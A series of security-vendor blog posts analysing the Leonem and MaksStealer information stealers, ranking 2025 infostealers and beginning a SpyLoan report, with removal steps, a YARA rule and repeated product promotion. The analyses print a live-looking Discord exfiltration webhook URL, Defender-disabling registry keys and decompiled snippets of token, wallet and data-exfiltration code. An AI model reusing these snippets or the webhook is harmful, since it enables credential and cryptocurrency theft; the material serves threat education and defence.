Understanding Trojan:Win32/Leonem

Trojan:Win32/Leonem is Microsoft Defender’s detection name for a spyware variant. This malware extracts authentication data from compromised systems. It targets credentials, session tokens, and login data from browsers and email clients.

Leonem differs from standard information stealers through its dual functionality. It steals credentials and downloads additional malware payloads. This capability escalates infections to more severe threats like ransomware or backdoors.

The malware spreads through phishing campaigns with malicious email attachments. These attachments appear as business documents, invoices, or shipping notifications. It also bundles with pirated software and fake updates from compromised websites.

Technical Analysis and Behavior

Leonem uses multiple evasion techniques to avoid detection. The malware checks for sandbox environments, debugging tools, and virtual machines. This helps it identify analysis systems used by security researchers.

Anti-Analysis Techniques

The malware leverages legitimate Windows processes to maintain stealth. It uses these processes to perform environment checks without triggering alarms. This approach helps it blend in with normal system activity.

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem conducts system reconnaissance using Windows Management Instrumentation (WMI) queries. It targets Win32_Bios and Win32_NetworkAdapter classes to gather hardware details. This information helps distinguish between real user environments and controlled analysis systems.

The malware examines registry locations and configuration files to identify security tools. It looks for analysis frameworks and security software installations. This reconnaissance helps it adapt its behavior accordingly.

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

Leonem generates a unique system fingerprint for each infected machine. This fingerprint allows threat actors to track infections and avoid redundant attacks. It also enables customized payloads based on system characteristics.

Security Software Neutralization

Leonem targets Microsoft Defender to disable real-time protection features. It accomplishes this through registry manipulation and service interference. The malware abuses legitimate system processes to execute these security bypasses.

The malware targets these system processes to execute security bypass operations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe

Leonem modifies registry keys that control Microsoft Defender’s protection mechanisms. These modifications disable real-time protection, script scanning, and behavioral monitoring. The changes create an environment where malware can operate without interference.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

Credential Harvesting Operations

After bypassing security, Leonem begins credential harvesting. The malware targets stored authentication data across multiple browsers and email clients. It focuses on databases and files where login credentials are stored.

Leonem implements real-time keystroke capture through DirectInput object creation. This keylogging functionality captures credentials as users enter them. It works on secure websites and applications that don’t store authentication details locally.

Data Exfiltration Methods

Leonem transmits harvested data to its command and control infrastructure. The malware uses Discord webhooks as its primary exfiltration channel. This technique allows malicious traffic to blend with legitimate communications.

The malware establishes TCP connections on ports 443 and 80. It then executes HTTP requests to the command and control infrastructure:

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

HTTP status codes indicate exfiltration success (200) or webhook endpoint compromise (404). Leonem also queries external IP information services like ip-api.com. This helps threat actors assess whether the compromised system represents a high-value target.

Impact Assessment and Risk Analysis

Leonem infections extend beyond immediate credential theft. Organizations and individuals face broader implications from this threat. The cascading effects can be severe and long-lasting.

Financial and Identity Theft Risks

Leonem enables unauthorized access to financial and personal accounts. Threat actors can execute various malicious activities once they obtain credentials. These activities often result in significant financial losses.

• Unauthorized access to online banking and financial services
• Fraudulent transactions and unauthorized purchases
• Unauthorized fund transfers from compromised accounts
• Identity theft and establishment of new credit accounts
• Compromise of cryptocurrency wallets and trading platforms

Financial losses from these activities can be difficult to recover. Fraud protection services may not cover all damages. Organizations face additional risks from employee credential compromise leading to broader network access.

Enterprise Security Implications

In enterprise environments, Leonem serves as an initial vector for extensive security breaches. Valid employee credentials enable threat actors to move laterally across networks. They can bypass multi-factor authentication through session token capture.

• Execute lateral movement across network infrastructure
• Bypass multi-factor authentication through session token capture
• Access sensitive corporate data, intellectual property, and customer information
• Deploy additional malware throughout the organization

Organizations can face comprehensive data breaches from single compromised endpoints. These breaches carry regulatory compliance implications and potential legal consequences. The reputational damage can be long-lasting and costly.

Secondary Payload Deployment

Leonem’s malware dropper functionality introduces additional risk factors. Initial infections can lead to deployment of more severe threats. These secondary infections often cause substantial damage beyond credential theft.

• Ransomware: File encryption attacks demanding payment for data recovery
• Banking Trojans: Malware targeting financial transactions and information
• Backdoors: Persistent access mechanisms for long-term system compromise
• Cryptominers: Resource hijacking for unauthorized cryptocurrency mining

Secondary infections can render systems inoperable or establish long-term surveillance capabilities. Threat actors gain persistent access to compromised environments. Recovery from these infections often requires complete system rebuilds.

Removal Procedures

Leonem’s security bypass capabilities require specialized removal approaches. Standard removal methods may be insufficient due to disabled security protections. Effective removal requires systematic procedures using specialized security tools.

Professional Removal Solution

GridinSoft Anti-Malware provides effective detection and elimination of Leonem and associated threats. This security software identifies and removes trojans and their components. It works even when system protections have been compromised.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Manual Removal Procedures

Professional removal tools are strongly recommended due to Leonem’s complexity. Experienced users may attempt manual removal following these procedures. Manual removal carries inherent risks and may not address all infection components.

1. Boot into Safe Mode: Restart the system and access Advanced Boot Options by pressing F8 during startup. Select “Safe Mode with Networking” to limit malware functionality during removal procedures.
2. Process Analysis: Open Task Manager (Ctrl+Shift+Esc) and examine running processes for suspicious activity. Look for unfamiliar processes consuming system resources or exhibiting unusual network activity.
3. Security Service Restoration: Restore Windows Defender functionality by repairing modified registry entries:
   • Launch Registry Editor (regedit)
   • Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
   • Locate and delete the DisableAntiVirus value or set it to 0
   • Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
   • Reset DisableRealtimeMonitoring, DisableIOAVProtection, and DisableScriptScanning values to 0
4. System Scan: After restoring Windows Defender, perform a system scan to identify and remove malicious components.
5. Browser Security: Remove suspicious browser extensions and reset browsers to default configurations:
   • Chrome: Settings > Advanced > Reset and clean up > Restore settings to original defaults
   • Edge: Settings > Reset settings > Restore settings to default values
   • Firefox: Help > Troubleshooting Information > Refresh Firefox
6. Credential Security: Change all account passwords using a clean, uninfected device. Prioritize financial services, email, and other sensitive platforms.

Manual removal may not address all infection components. Leonem’s complexity and potential for deploying additional threats make professional removal tools more reliable. Complete system scans are essential after any removal attempt.

Prevention and Security Hardening

Preventing Leonem infections requires multiple security measures. These measures address both technical vulnerabilities and human factors. A multi-layered defense strategy provides the most effective protection.

Email Security Implementation

Leonem primarily distributes through phishing campaigns. Email security measures are essential for prevention. Organizations should implement strict policies regarding email attachments and sender verification.

• Attachment Verification: Implement strict policies regarding email attachments from unknown sources and verify unexpected attachments from known contacts
• Sender Authentication: Carefully examine sender email addresses for domain spoofing and subtle misspellings
• Urgency Assessment: Exercise caution with emails creating artificial urgency, particularly those requesting credential verification or financial transactions
• Email Filtering: Deploy email security solutions capable of detecting and quarantining phishing attempts

System Security Configuration

System security requires regular maintenance and proper configuration. Organizations should maintain current software updates and deploy endpoint protection. Application control and network security provide additional protection layers.

• Update Management: Maintain current operating system and software updates to address security vulnerabilities
• Endpoint Protection: Deploy anti-malware solutions like GridinSoft Anti-Malware capable of detecting threats
• Application Control: Implement application whitelisting to prevent unauthorized program execution
• Network Security: Configure firewalls to monitor and control both inbound and outbound network traffic
• Macro Security: Configure Microsoft Office to disable macros by default or restrict execution to digitally signed macros

Authentication Security

Authentication security provides critical protection against credential theft. Multi-factor authentication adds security layers beyond passwords. Password managers help generate and store strong, unique passwords.

• Multi-Factor Authentication: Implement MFA across all systems and services to provide additional security layers
• Password Management: Utilize password managers to generate and store strong, unique passwords
• Credential Storage: Avoid storing credentials in browsers or implement password managers with enhanced encryption
• Access Auditing: Regularly review account access permissions and authorized applications

Security Awareness and Training

User education provides essential protection against social engineering attacks. Regular security awareness training helps users recognize phishing attempts. Clear security policies establish guidelines for software installation and incident reporting.

• User Education: Provide regular security awareness training focusing on phishing recognition and social engineering tactics
• Policy Development: Establish clear security policies for software installation, email handling, and incident reporting
• Incident Response: Implement procedures for rapid reporting and response to suspicious activities
• Security Culture: Foster an organizational culture where security verification is standard practice

These preventive measures reduce the risk of Leonem and similar threats. Effective security requires coordination between technological solutions and educated users. Regular review and updates of security measures ensure continued protection.

Frequently Asked Questions

The post Trojan:Win32/Leonem – Information Stealer Analysis & Removal Guide appeared first on Gridinsoft Blog.

I’ve analyzed dozens of these gaming-related malware strains, and this one is particularly sneaky. Let’s break down what MaksStealer is, how it works, and most importantly – how to kick it off your system before it empties your crypto wallets.

MaksStealer Malware

Source: Analysis of MaksStealer behavior from Triage and VirusTotal findings, May 2025

What Is MaksStealer and How Bad Is It?

MaksStealer is a Java-based information stealer that’s specifically targeting gamers. It masquerades as a performance enhancement mod or cheat for Minecraft’s Hypixel SkyBlock but is actually harvesting every piece of valuable data it can find. This malware is especially dangerous because it targets multiple data types at once – your passwords, gaming accounts, and cryptocurrency wallets.

Unlike some malware that announces itself with annoying popups or system slowdowns, MaksStealer works silently in the background. You won’t even know it’s there until your accounts start getting hijacked or your crypto mysteriously disappears. That stealth factor makes it particularly dangerous for everyday users who aren’t constantly monitoring their system processes.

How This Digital Pickpocket Works

Once executed, MaksStealer immediately starts scanning your system for valuable data. It focuses on three main categories:

1. Web Browser Theft

MaksStealer doesn’t play favorites – it hits all major browsers. Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and Yandex are all on its hit list. The malware expertly extracts saved passwords, cookies, autofill data, and browsing history from these browsers.

Think about all those sites where you’ve clicked “remember password” for convenience. Banking sites, email, social media, online shopping – MaksStealer can now access all of them. It’s like handing over your entire digital identity on a silver platter.

2. Discord Account Targeting

For gamers, Discord is often the communication hub for everything. MaksStealer specifically looks for Discord authentication tokens stored on your computer. These tokens are basically digital keys to your Discord account.

With your token, attackers can log into your Discord account without needing your password or bypassing two-factor authentication. They can then impersonate you, message your friends with malware links, join private servers, or access private conversations. This aspect is particularly effective for spreading the malware further through gaming communities.

3. Cryptocurrency Wallet Raiding

Perhaps most financially damaging is MaksStealer’s ability to target cryptocurrency wallets. It searches for popular wallet software like Armory, Bytecoin, Coinomi, Exodus, Ethereum, Electrum, Atomic Wallet, and many others. The malware extracts wallet files, private keys, and seed phrases.

Once attackers have this data, your cryptocurrency can be transferred away in minutes. And due to the decentralized, anonymous nature of crypto transactions, these funds are virtually impossible to recover. One moment your digital wallet is full, the next it’s emptied with no recourse.

How MaksStealer Spreads: The Bait and Switch

Malware distributors are getting creative with their delivery methods. MaksStealer typically spreads through channels that gamers frequently use and trust:

• Gaming Forums: Posts claiming to offer performance enhancements or “legal” cheats for Minecraft
• YouTube Comments: Links in comment sections of Minecraft tutorials or gameplay videos
• Discord Servers: Malicious users sharing “exclusive” mods in gaming servers
• Unofficial Mod Sites: Fake or compromised websites hosting malicious JAR files
• Pirated Game Portals: Bundled with cracked game versions or key generators

The common element is social engineering. The attackers know gamers are often looking for ways to enhance their gameplay or get an edge. They’re exploiting that desire by packaging their malware as something beneficial. It’s like offering someone a performance-enhancing drink that’s actually poison.

What makes this distribution method particularly effective is that gamers are already accustomed to downloading and running third-party software. Minecraft’s massive modding community has created an environment where running JAR files is normalized. MaksStealer exploits this trust.

Source: Data types targeted by MaksStealer based on behavioral analysis

Warning Signs Your System Might Be Infected

MaksStealer is designed to operate stealthily, but there are some subtle signs that might indicate infection:

• Unexplained Account Activity: Logins to your accounts from unknown locations or devices
• Missing Cryptocurrency: Unexplained transactions or emptied wallets
• Strange Discord Messages: Messages sent from your account that you didn’t write
• Performance Issues: While running in the background, MaksStealer may cause slight system slowdowns
• Unusual Network Traffic: Increased data usage when you’re not actively downloading
• Java Process Running: Unexpected Java processes in your task manager after running a Minecraft mod

If you notice any of these signs after downloading and running a new Minecraft mod or tool, you should act immediately. Information stealers work quickly, so every minute counts in preventing further data theft.

You can check for suspicious Java processes using this PowerShell command:

# Check for suspicious Java processes
Get-Process | Where-Object {$_.ProcessName -like "*java*"} | 
Select-Object ProcessName, Id, StartTime, Path | 
Format-Table -AutoSize

# Look specifically for processes with MaxCoffe in command line (if advanced)
Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -like "*MaxCoffe*" -or $_.CommandLine -like "*Coffe*"} | 
Select-Object ProcessId, Name, CommandLine

Suspicious indicators include Java processes running from temporary directories, recently started Java processes that you don’t recognize, or processes with “MaxCoffe” in their command line.

For Linux or Mac users, you can use this Bash command:

# List all Java processes with details
ps aux | grep -i java

# Check for suspicious Java processes with MaxCoffe or Coffe in their arguments
ps aux | grep -i java | grep -E "MaxCoffe|Coffe"

# Check for recently modified Java-related files (last 7 days)
find ~/ -name "*.jar" -mtime -7 -ls 2>/dev/null

Security researchers can also use this YARA rule to detect potential MaksStealer samples:

rule MaksStealer_Java_InfoStealer {
    meta:
        description = "Detects MaksStealer Java information stealer"
        author = "GridinSoft Security Researcher"
        date = "2025-05"
        severity = "high"
        hash = "9a17f87dcd2208f8f62ed76a15a6c52817008e77179c8b1f7f39c079d419f398"

    strings:
        $mod_header = "@Mod" ascii
        $mod_id = "modid = \"MaxCoffe\"" ascii
        
        $browser1 = "\\Google\\Chrome\\User Data" ascii
        $browser2 = "\\Mozilla\\Firefox\\Profiles" ascii
        $browser3 = "\\BraveSoftware\\Brave-Browser" ascii
        
        $discord1 = "\\discord\\Local Storage\\leveldb" ascii
        $discord2 = "\\discordcanary\\Local Storage\\leveldb" ascii
        
        $crypto1 = "\\Bitcoin\\wallet.dat" ascii
        $crypto2 = "\\Ethereum\\keystore" ascii
        $crypto3 = "\\Electrum\\wallets" ascii
        
        $obf_pattern1 = "lIIl(" ascii
        $obf_pattern2 = "lII[lll[" ascii

    condition:
        $mod_header and $mod_id and
        (2 of ($browser*)) and
        (1 of ($discord*)) and
        (1 of ($crypto*)) and
        (1 of ($obf_pattern*))
}

How to Remove MaksStealer From Your System

If you suspect you’ve been infected with MaksStealer, follow these steps to remove it:

Step 1: Disconnect from the Internet

Immediately disconnect your computer from the internet. This prevents the malware from sending more of your data to the attackers’ servers or receiving additional commands. You can reconnect once the malware is removed.

Step 2: Scan with Antimalware Software

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

After scanning with anti-malware software, you might want to perform additional manual cleanup. Here’s a batch script that can help remove common MaksStealer artifacts:

Step 3: Reset Your Passwords and Secure Accounts

After removing the malware, immediately change passwords for all your important accounts. Start with email accounts, banking websites, and cryptocurrency platforms. Use a different device for these password changes if possible, as keyloggers might still be active.

Enable two-factor authentication on all accounts that support it. This provides an additional layer of security even if your passwords are compromised. For Discord specifically, generate a new token by logging out and back in on all devices.

Step 4: Secure Your Cryptocurrency

If you have cryptocurrency wallets, create new wallets with fresh keys and transfer any remaining funds immediately. Consider the old wallets permanently compromised. Hardware wallets are a more secure option for storing significant cryptocurrency amounts, as they’re not vulnerable to this type of malware.

How to Protect Yourself From Information Stealers

Prevention is always better than cure, especially with information stealers. Here’s how to stay safe:

• Download mods only from official sources like CurseForge or the official Minecraft forums
• Be suspicious of “too good to be true” mods offering extraordinary features or cheats
• Keep your system and antivirus updated to protect against known threats
• Use a password manager instead of saving passwords in your browser
• Enable two-factor authentication on all important accounts
• Consider a hardware wallet for storing significant amounts of cryptocurrency
• Scan downloaded files with antivirus before executing them
• Be cautious of links in Discord servers, YouTube comments, and forums from unknown users

Remember that Java files (.JAR) are executable programs. Treat them with the same caution you would any EXE file. Just because it’s labeled as a “mod” doesn’t mean it’s safe.

Similar Threats to Watch Out For

MaksStealer isn’t the only threat targeting gamers and cryptocurrency users. Stay alert for these similar threats:

• StilachiRAT Crypto Stealer – Another dangerous cryptocurrency stealer targeting multiple wallets
• How to Detect, Remove and Prevent Infostealers – Comprehensive guide on information stealers
• 5 Dangers of Cracked Games – Why downloading pirated games puts you at risk
• RedEnergy Stealer/Ransomware – Multi-function malware that steals data and encrypts files
• Legion Stealer Targeting PUBG Players – Similar gaming-focused information stealer

How MaksStealer Works

The moment you run that innocent-looking mod, MaksStealer kicks into high gear. It doesn’t mess around. The malware launches its reconnaissance mission across your system, hunting for valuable data to steal.

Looking at the decompiled code, it’s clear these guys aren’t amateurs. The malware systematically targets every major browser on your system – Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and even Yandex. Nowhere to hide, basically.

Inside the MaksStealer Code

The malware’s code is heavily obfuscated, with meaningless variable names and encrypted strings to avoid detection. Let’s look at some actual snippets from the decompiled malware:

First, the entry point disguised as a legitimate Minecraft mod:

@Mod(
   modid = "MaxCoffe", 
   version = "1.1.7"
)
public class MaxCoffe {
   // Minecraft mod class implementation
   // Secretly initializes stealer functionality
   public MaxCoffe() {
      this.1 = new Coffe();
      this.1.3();
   }
}

Once initialized, the malware starts scanning for browser data directories. The code is intentionally confusing to evade antivirus detection:

private void scanBrowsers() {
   String[] var1 = new String[]{"Chrome", "Firefox", "Edge", "Opera"};
   String[] var2 = new String[]{"Brave", "Vivaldi", "Yandex"};
   String var10000 = System.getenv("LOCALAPPDATA");
   String var3 = var10000 + "\\Google\\Chrome\\User Data";
   String var4 = var10000 + "\\BraveSoftware\\Brave-Browser\\User Data";
   // [...more browser paths...]
   
   for (int i = 0; i < var1.length; i++) {
      extractCredentials(browserPaths[i]);
      extractCookies(browserPaths[i]);
      extractHistory(browserPaths[i]);
   }
}

The Discord token stealing component is equally sneaky, extracting authentication tokens from multiple possible locations:

private String[] getDiscordTokens() {
   ArrayList tokenList = new ArrayList();
   String[][] paths = new String[][]{
      new String[]{System.getenv("APPDATA") + "\\discord\\Local Storage\\leveldb", "*.ldb"},
      new String[]{System.getenv("APPDATA") + "\\discordcanary\\Local Storage\\leveldb", "*.ldb"},
      new String[]{System.getenv("APPDATA") + "\\discordptb\\Local Storage\\leveldb", "*.ldb"}
   };
   
   // Token extraction logic
   // Regex pattern to find tokens: "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"
   
   return (String[])tokenList.toArray(new String[0]);
}

For cryptocurrency wallets, the malware searches for specific wallet files and exfiltrates them:

private void stealCryptoWallets() {
   // Bitcoin Core
   grabFile(System.getenv("APPDATA") + "\\Bitcoin\\wallet.dat");
   
   // Ethereum
   grabFile(System.getenv("APPDATA") + "\\Ethereum\\keystore");
   
   // Electrum
   grabFile(System.getenv("APPDATA") + "\\Electrum\\wallets");
   
   // Atomic Wallet
   grabFile(System.getenv("APPDATA") + "\\atomic\\Local Storage\\leveldb");
   
   // More wallets...
}

Finally, the data exfiltration process that sends your stolen information to the attacker’s server:

private void sendData(byte[] data) {
   try {
      URL url = new URL("https://[redacted-malicious-domain]/upload.php");
      HttpURLConnection conn = (HttpURLConnection)url.openConnection();
      conn.setRequestMethod("POST");
      conn.setDoOutput(true);
      
      // Adding system info to identify the victim
      conn.setRequestProperty("User-Agent", "MaksStealer/1.0");
      conn.setRequestProperty("Computer-Name", System.getenv("COMPUTERNAME"));
      conn.setRequestProperty("User-Name", System.getProperty("user.name"));
      
      // Send stolen data
      OutputStream os = conn.getOutputStream();
      os.write(data);
      os.flush();
      os.close();
      
      // Check response
      int responseCode = conn.getResponseCode();
      // Clean up traces if successful
   } catch (Exception e) {
      // Silent exception handling to avoid detection
   }
}

Reading through this code reveals just how sophisticated these info-stealing operations have become. The malware is designed to be stealthy, comprehensive, and efficient at extracting your most valuable digital assets.

The Bottom Line on MaksStealer

MaksStealer represents a growing trend of malware targeting specific communities – in this case, Minecraft players. It exploits the trust and openness of gaming communities to spread rapidly and effectively. By promising game enhancements while actually stealing sensitive information, it’s a perfect example of how social engineering and technical exploits work together.

Stay vigilant when downloading any third-party software, especially for games with active modding communities. The excitement of enhanced gameplay isn’t worth the risk of having your digital life stolen. Remember that legitimate mods don’t need to steal your data to function properly.

Has your system been affected by MaksStealer or similar malware? Share your experience in the comments to help warn others about this threat.

The post MaksStealer (MaxCoffe): The Minecraft Mod That’s Actually Stealing Your Passwords appeared first on Gridinsoft Blog.

The data tells a striking story: while media headlines scream about ransomware attacks, infostealers quietly dominate the threat landscape, accounting for nearly a quarter of all cybersecurity incidents. This silent majority operates without flashy ransom notes or system lockdowns, making them even more dangerous. As the defensive focus shifts to stopping ransomware, these stealthy data thieves slip through the cracks, reaping massive rewards with far less attention. The trend is clear – attackers have realized that stealing your data offers better ROI than holding it hostage.

What Even Is an Infostealer?

Infostealers are exactly what they sound like – malware designed to quietly extract sensitive information from your device. They target passwords, credit card details, cryptocurrency wallets, browser cookies, and pretty much anything that could be valuable on the digital black market. Think of them as the cybercriminal’s Swiss Army knife – versatile, reliable, and exceedingly popular.

Unlike ransomware’s dramatic hostage-taking approach, infostealers prefer to work in the shadows. They slip in, grab what they want, and often leave without you noticing anything’s wrong. By the time you realize your accounts have been compromised, your data is already being sold on dark web marketplaces or used for follow-up attacks.

Why Infostealers Are Booming in 2025

According to IBM’s X-Force Threat Intelligence Index 2025, credential harvesting now occurs in 29% of all cybersecurity incidents. That’s a massive slice of the cybercrime pie. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer logs first – meaning these stealers often serve as the appetizer before the main ransomware course.

Cryptocurrency remains a major driver behind infostealer popularity. With traditional banking fraud becoming harder to pull off, crypto wallets represent a softer target with potentially massive payoffs. Plus, the rise of BYOD (Bring Your Own Device) policies has created a perfect storm – personal devices often have both work and personal credentials, making them information goldmines.

The Fab Five: 2025’s Most Notorious Infostealers

Not all infostealers are created equal. Some have risen to the top through a combination of advanced features, reliability, and aggressive marketing on cybercrime forums. Here’s the current leaderboard of data thieves keeping security professionals up at night.

1. Lumma Stealer (LummaC2)

Lumma has climbed to the #1 spot in 2025, a remarkable rise for malware first detected in late 2022. Its success comes from its stealthy approach to data exfiltration – sending information in small fragments to avoid triggering security alerts. The developers offer tiered pricing plans ranging from $250 to $1,000, with premium features like network sniffing functionality reserved for big spenders.

What makes Lumma particularly dangerous is its comprehensive targeting. It captures browser data, cryptocurrency wallets, two-factor authentication apps, email clients, and even Telegram sessions. For cybercriminals willing to shell out $20,000, Lumma’s developers will even provide source code access and reselling rights – talk about customer service.

2. StealC Stealer

StealC has rocketed to second place this year, proving that sometimes the new kid on the block can outshine the veterans. Released in early 2023, StealC combines the best features of other top infostealers with an aggressive development cycle – releasing new features weekly. Unlike many competitors, StealC offers free testing periods and unusually responsive customer support on darknet forums.

Security researchers at Trac Labs noted StealC’s botched v2 release in 2024, but the developers quickly recovered with v2.1, which improved its ability to evade detection while expanding its targeting capabilities. Its growing market share makes it clear that stumbles haven’t impeded its rise to prominence.

3. RedLine Stealer

RedLine has held onto a top-three position since 2020, demonstrating impressive staying power in a fickle malware market. Written in C#, this veteran infostealer excels at grabbing credentials from over 60 browsers, VPN configs, cryptocurrency wallets, and FTP clients. Its relatively user-friendly control panel and reasonable pricing (starting around $150-$200) have maintained its popularity among less technical cybercriminals.

Despite being one of the older contenders, FortiGuard Labs reports that RedLine continues to receive regular updates. Recent versions have improved its ability to bypass Windows Defender and added capabilities to steal gaming accounts – because apparently, your Steam inventory is now worth stealing too.

4. Raccoon Stealer

If infostealers had an old guard, Raccoon would be part of it. Around since 2019, this digital veteran has somehow managed to stay relevant in the ever-changing malware landscape. While newer threats come and go, Raccoon keeps adapting and evolving – kind of like that one friend who somehow stays cool despite getting older.

What’s interesting about Raccoon isn’t just its staying power but how it’s run like an actual business. The developers offer round-the-clock customer support through Telegram (better service than my internet provider, honestly) and roll out updates more consistently than most legitimate software companies. They’ve recently added Telegram Desktop theft capabilities and expanded their crypto wallet targeting – because apparently stealing your Bitcoin wasn’t enough, now they want your obscure altcoins too.

At $275 monthly, it’s not exactly budget-friendly for aspiring cybercriminals, but you get what you pay for. Raccoon has earned its reputation for reliability in the underground markets. Hunt.io researchers recently caught it using fileless infection techniques – basically operating in your computer’s memory without leaving obvious traces on disk. It’s like a burglar who not only doesn’t break your windows but somehow manages to avoid leaving footprints on your carpet.

5. Vidar Stealer

Vidar is what happens when malware developers embrace the “build-your-own-adventure” model. Born as an offshoot of another stealer called Arkei back in 2018, Vidar gives its criminal users a modular, mix-and-match approach to data theft. Want to steal passwords but not cookies? No problem. Need crypto wallets but not browser history? They’ve got you covered.

What makes security pros lose sleep over Vidar is its chameleon-like ability to disappear after doing its dirty work. Once it’s grabbed what it came for, Vidar can completely remove itself from your system – like a thief who not only steals your valuables but also washes the dishes and vacuums before leaving, just to make you question if you’ve been robbed at all.

The U.S. Department of Health and Human Services didn’t mince words when they called Vidar “exceptionally potent.” It’s frequently deployed alongside ransomware like STOP/Djvu in tag-team attacks. The latest versions have even figured out how to steal MFA seed values – those supposedly “unbreakable” second factors protecting your accounts. It’s basically telling your two-factor authentication, “That’s cute, hold my beer.”

Data Targeted by Information Stealers

The visualization reveals a disturbing truth: modern infostealers don’t just target one type of data—they’re designed for comprehensive digital identity theft. Lumma leads the pack in browser data collection, which shouldn’t surprise anyone considering we practically live in our browsers. Meanwhile, the crypto wallet targeting reflects attackers’ preference for assets that are both valuable and irreversible once stolen. The pattern is clear: these tools are becoming increasingly sophisticated in their ability to extract everything from your digital life worth stealing.

Real-World Impact: When Infostealers Strike

The damage from infostealers extends far beyond individual victims. Major breaches in early 2025 demonstrate their growing threat to organizations of all sizes. Samsung Tickets suffered a massive leak in March when a hacker exploited credentials stolen by an infostealer infection from 2021, exposing 270,000 customer records.

Even more alarming, the HELLCAT ransomware group has made infostealers central to their strategy, successfully breaching Jaguar Land Rover, Telefónica, and several other major companies using stolen credentials from infostealer logs. These incidents highlight how a single compromised device can lead to enterprise-wide breaches months or even years later.

How to Keep Your Data From Being Stolen

Protecting yourself against infostealers doesn’t require a cybersecurity degree. Focus on these essentials:

• Update everything – Patch your system and apps promptly
• Use a password manager – Create unique passwords for every site
• Enable MFA everywhere possible – Preferably using authenticator apps
• Avoid pirated software – That “free” Photoshop is a trojan horse
• Run security software – Choose solutions that detect behavioral anomalies

For more detailed information, check out our comprehensive guide on how to detect, remove, and prevent infostealer infections.

The Bottom Line

Here’s the uncomfortable truth that cybersecurity professionals don’t always articulate clearly: in 2025, it’s not a question of if your credentials will be targeted, but when. Infostealers have evolved from crude data-grabbing tools into digital espionage platforms that operate with unsettling efficiency. They’re the silent assassins of the cybersecurity world – no flashy techniques, no dramatic demands, just quiet theft that often goes unnoticed until the damage is done.

The reality is that cybercriminals have realized a fundamental truth about human behavior: we’re creatures of habit and convenience, routinely sacrificing security for simplicity. Password reuse, postponed updates, and clicking without thinking aren’t just bad habits – they’re open invitations to these digital thieves. The brutal economics also can’t be ignored: why would criminals bother with complex ransomware operations when they can extract cryptocurrency wallet contents directly, without the messy negotiations?

The cybersecurity landscape is constantly evolving, but one principle remains stubbornly consistent – attackers will always follow the path of least resistance to valuable data. By implementing even some of the protection measures outlined above, you’re essentially making yourself a harder target. In the digital wilderness, you don’t need to outrun the bear – you just need to outrun the other hikers. Make your digital presence secure enough that attackers look for easier pickings elsewhere, and you’ve won half the battle.

Want to stay protected without a computer science degree? Gridinsoft Anti-Malware today and let us handle the technical heavy lifting while you get back to whatever you were doing before you started worrying about digital pickpockets.

The post Top 5 Infostealer Malware of 2025: The Silent Data Snatchers appeared first on Gridinsoft Blog.

8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

Researchers have found a series of malicious apps on the Google Play Store. Collectively, these programs have been installed over 8 million times. These apps pose as quick-loan services, exploiting users’ need for money under the guise of financial assistance. Instead of what they state, these fake loan apps collect sensitive data and further intimidate victims.

The malware identified in the majority of these samples is SpyLoan. Initially detected in 2020, it has resurfaced with updated tactics, with another noteworthy appearance in 2023. It now targets users in countries such as Mexico, Colombia, Thailand, and Tanzania.

As the name implies, SpyLoan mainly hides under the guise of loan-related apps. Its goal is to сollect sensitive user data, exploit permissions to access phone features and coerce users through intimidation or extortion. The user may get the loan, but will also get phishing phone calls, SMS messages and emails, all with the potential of financial damage and psychological abuse.

How the Malware Operates

SpyLoan malware operates by tricking users into sharing personal and financial information. The apps use social engineering tactics to request extensive permissions, such as access to contacts, call logs, SMS, and device location.

